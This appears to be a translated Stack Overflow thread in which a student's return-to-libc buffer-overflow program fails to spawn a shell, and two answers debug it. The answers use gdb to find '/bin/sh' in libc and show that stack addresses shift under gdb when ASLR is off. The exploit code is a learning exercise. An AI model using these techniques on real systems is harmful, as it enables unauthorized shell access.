21

我应该想出一个利用“返回 libc 缓冲区溢出”的程序。也就是说,当执行时,它会干净地退出并显示一个 SHELL 提示。该程序在 bash 终端中执行。下面是我的 C 代码:

#include <stdio.h>
int main(int argc, char*argv[]){
    char buffer[7];

    char buf[42];
    int i = 0;
    while(i < 28)
    {
            buf[i] = 'a';
            i = i + 1;
    }

    *(int *)&buf[28] = 0x4c4ab0;
    *(int *)&buf[32] = 0x4ba520;
    *(int *)&buf[36] = 0xbfffff13;

    strcpy(buffer, buf);

    return 0;
}

使用gdb,我已经能够确定以下内容:

  • “系统”地址:0x4c4ab0
  • “退出”地址:0x4ba520
  • 字符串“/bin/sh”驻留在内存中:0xbfffff13

我还知道,使用gdb将 32 个“A”插入我的缓冲区变量将覆盖返回地址。因此,鉴于系统调用是 4 个字节,我首先在 28 个字节处填充我的内存“泄漏”。在第 28 个字节,我开始我的系统调用,然后退出调用,最后添加我的“/bin/sh”内存位置。

但是,当我运行该程序时,我得到以下信息:

sh: B���: command not found
Segmentation fault (core dumped)

我真的不确定我做错了什么......

[编辑]:我能够通过导出环境变量来获取字符串“/bin/sh”:

export MYSHELL="/bin/sh"
4

2 回答 2

58

您可以在 libc 中搜索 /bin/sh 字符串的固定地址。然后在 gdb 中运行你的程序:

> (gdb) break main
> 
> (gdb) run   
>
> (gdb) print &system  
> $1 = (<text variable, no debug info>*) 0xf7e68250 <system>
> 
> (gdb) find &system,+9999999,"/bin/sh"  
> 0xf7f86c4c
> warning: Unable to access target memory at 0xf7fd0fd4, halting search. 
> 1 pattern found.

祝你好运。

于 2014-07-29T19:51:47.193 回答
5

您的程序中的问题是您认为指向/bin/sh字符串的指针实际上并未指向/bin/sh.

您使用gdb. 但即使没有堆栈随机化,程序运行时 shell 变量的堆栈地址也与gdb没有时不同gdbgdb正在将一些调试信息放入堆栈,这将改变你的 shell 变量。

在这里说服自己是一个快速而肮脏的程序,可以在堆栈中找到一个/bin/sh字符串:

#include <stdio.h>
#include <string.h>

int main(void)
{
    char s[] = "/bin/sh";
    char *p = (char *) 0xbffff000;

    while (memcmp(++p, s, sizeof s));

    printf("%s\n", p);
    printf("%p\n", p);
}

首先仔细检查堆栈随机化是否已禁用:

ouah@maou:~$ sysctl kernel.randomize_va_space
kernel.randomize_va_space = 0
ouah@maou:~$

好的,没有堆栈随机化。

让我们编译程序并在外面运行它gdb

ouah@maou:~$ gcc -std=c99 tst.c
ouah@maou:~$ ./a.out
/bin/sh
0xbffff724
ouah@maou:~$

现在让我们在下面运行它gdb

ouah@maou:~$ ./a.out
/bin/sh
0xbffff724
ouah@maou:~$ gdb a.out -q
Reading symbols from /home/ouah/a.out...(no debugging symbols found)...done.
(gdb) r
Starting program: /home/ouah/a.out
/bin/sh
0xbffff6e4

Program exited normally.
(gdb) quit
ouah@maou:~$

如您所见,/bin/sh当程序在内部或外部运行时,字符串的地址是不同的gdb

现在你可以做的是使用这个程序的一个变体来找到你的字符串的真实地址或更优雅的方法,/bin/sh直接从 libc 获取一个字符串的地址(你可以猜到有几次出现)。

于 2013-10-01T20:19:36.683 回答